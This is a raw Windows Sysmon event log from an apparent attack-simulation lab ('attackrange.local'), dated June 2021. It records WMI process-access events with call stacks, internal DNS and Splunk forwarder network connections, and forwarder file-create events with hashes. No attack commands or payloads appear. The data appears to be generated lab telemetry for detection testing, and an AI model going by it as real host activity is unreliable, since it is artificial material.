21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151126Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151125Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.164{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151124Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.164{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5fbdb|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151123Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.164{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104811Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:40.890{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal53031- 23542300x8000000000000000151268Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:43.765{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32070C899A03FDA362803B69D4EB507A,SHA256=A9EAD32D9C1BC34FF913260E8BEBE6E6137CFB435E2507E982E2CF35FF61A6DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104813Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:43.309{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7F08E0535F59DA92A7E402B07FD43AF,SHA256=9B237590E15BE241816974D57E5EC2D81DDBCBC494118E08D7B55E52FA7D3FA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104812Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:43.306{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E0EB7FE274C584426257ED20FC1C5F,SHA256=6D73BA8DBCC064282C5ADEC0C04B7D2E4D768732742BECB6EE1AB2889A6DBFFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104815Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:44.669{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF5C92875FA0C0CFF3BD9A1C6F5E36C,SHA256=F54CBF55993C665E8EBC6ED507215F25D53316F519B525D58D940227D799B2E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104814Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:42.883{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55410-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151271Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:45.601{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1A0B3DBDBA3589587C42EAFA28D059,SHA256=DA2E26687FE97249F72459950D52AD2BEA8AF86BB57AC9AB46E75BE3B5232726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151270Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:45.599{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5904221EBCD6CE620960159B6A1FDB6E,SHA256=72B1E19723C0E4A8052C973E3ED7D2FA21FBC3EA70ECFC10FD521A52A153A5A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151269Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:45.596{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1169A0340B7543C21DCA1D747D180C1,SHA256=019B2E45160F02E231320DEAEBB5BE4F7188A77337D64C727A7B69C2E32DC883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104816Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:46.020{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78B2875C4522241273A0CE7ACFD8B72D,SHA256=4D8E906233265A79CC76E6E6A7F304132F2EAD3FEAE5348A843F996B7A64E651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151273Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:46.600{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58309A09F4F0ACAE815B865DC8F1F16,SHA256=81785B9F40F8F4B68A1CABFD510D229C8FF9C20E13693A649F08EA868B47A357,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151272Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:44.069{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58391-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104817Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:47.385{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BBE0F7E5547AA33F2812E4FF58C9632,SHA256=C1C405F65EF452431513E0E99A2E46B9CD17FF4752D66147F3B0A5D6568E512E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151274Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:47.630{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB082321FF008CEAB82568C4B7459012,SHA256=B2077FA5C4CFC8237FC3D68BBC5178FFAAA4F4C9780FF30850EA842B42132D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104818Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:48.750{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CF5141D26CE23741815DC9B8316DF59,SHA256=5BE1BFCC36AB0E43517966472B949FD2B75F5BC3EB72A9B2910ECB914F6704AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151275Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:48.645{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF3DE78DE32C1A771D195ED12DAB808A,SHA256=3EB96C89C68F463ED3959BA6C0BE039C03E0FCABA3E7C94887637DE766137928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151276Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:49.646{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61095585BCE7878C3A68385893D7D886,SHA256=1147C38155370014A058D357468E9B46E391A1E9A282406530D7637BE2A0AC7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104820Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:48.848{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55411-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104819Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:50.113{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C7DC315FF9C4FA5E2C301C74DE1498F,SHA256=B214D45CD36979173778DD8517C0C37F414CF8067750A78DCEA4A7DF6ABA04F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151277Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:50.677{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF120F75C4D8841AEF003609D577D7D,SHA256=70F34E59A7EB05E3F592BCB3627DFD39BA0955486B8931480C20F18762A29138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104821Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:51.474{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91D0EAE7206AD5280287A3193DD06B66,SHA256=D08313729ADF035C3B5006F8FE9F476E34880100272B58AC0E6DD17BD513D8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151280Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:51.694{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA77522E03461D0658F36316C73D6E9,SHA256=18F91C64941C2B1945E726AABA92C9215354B6A52B6A5B1413F26F81AA2DB4C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151279Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:51.130{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFCA20B9E536081008624A9B94A7DE27,SHA256=8BD807DA84DEC1E2555D62FE09E7E1CB86FC9A8517304F3F274FD794469DB140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151278Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:51.130{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AFCD12D07FDD2206AA0024DB280EE9A,SHA256=39BC7E52E7A6E7AAC23035438E3B9DCDAFC9BB00474C67B1930DEA6D44388F18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104823Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:52.838{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1452B5539A1D59C2F891A8893E54DDA,SHA256=4EF13BBA46A2BEA279B935BE7212EF5BADD6A8852FD1BEF25BBBD2BA89BD6E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104822Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:52.158{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A3AF4E0484B03F571F2D9380F2EB27D,SHA256=DA17666303CCC80686805D67CD4C2E6F9871506BF3AEAC6EB84FE097EB1D0AE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151282Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:52.713{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB15E98947C1A81FE1FC6796804387D3,SHA256=442F26CA3684C0C31CE53F54C0DEEA30EDE4F8D70236DFC53848F75FCF0A59B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151281Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:49.935{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58392-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151283Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:53.743{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF1C72822F03455636CE3A4185AFF94,SHA256=CEC91D943AAC603A94DF827209BE6CAF8F81A78787DFD915CAA5FCCD5F841D09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104824Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:54.203{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76B7AB606FA9C83C7DC117D69AA84293,SHA256=9E45005CD5142177E505EE794B99A5CC26CC8184C69AB3ADD2123D656F98F66D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151284Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:54.774{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38EF7FF8F67E888789543BCDD1619C8,SHA256=FC3AF343BDEF549EDAF0CFE42C01FB53CF317B8FF49DF824C6648CD3A025A83D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104825Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:55.578{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C1FEBE193DD87F7FFC9EA8B4CE62F2,SHA256=45C68FF915FF741AFE5D4E1845B483B98A38546CF3B5344EB53778AD39209FED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151285Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:55.790{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=221716A3E57060E6565DED56EF490FEC,SHA256=7EB0EA013FFD4AE3CDB5394BECB5522A51A0326E0936A2961DFB591BC5F6472F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104827Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:56.942{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FC9CCD1B5B16807015F2E31E1405CF7,SHA256=4B4DA8C664607380F2CA9856261849697EB8D871E6A57B7DE2D27A53BABBA918,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104826Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:54.816{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55412-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151288Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:56.826{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=975765F219A73848B149EBE2DAD68703,SHA256=56BCDECDC1C996A39D4E5F3A655688FCC3029A92E9A33CF6BE042BC8FB6793A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151287Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:56.242{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=226EC8D12335599C0552FB2661ED3E75,SHA256=35AB6427E6278C77FC813564A1EE53E834DA72C6C9A8DA0115249943542EE8BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151286Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:56.242{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFCA20B9E536081008624A9B94A7DE27,SHA256=8BD807DA84DEC1E2555D62FE09E7E1CB86FC9A8517304F3F274FD794469DB140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151290Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:57.842{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EFEB63E2EC3133496F8ED59861562F0,SHA256=0E2DD33AEFE459BBE3C828FE095B604CAA68040DF079CA201D26C08BA03F1349,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151289Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:55.047{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 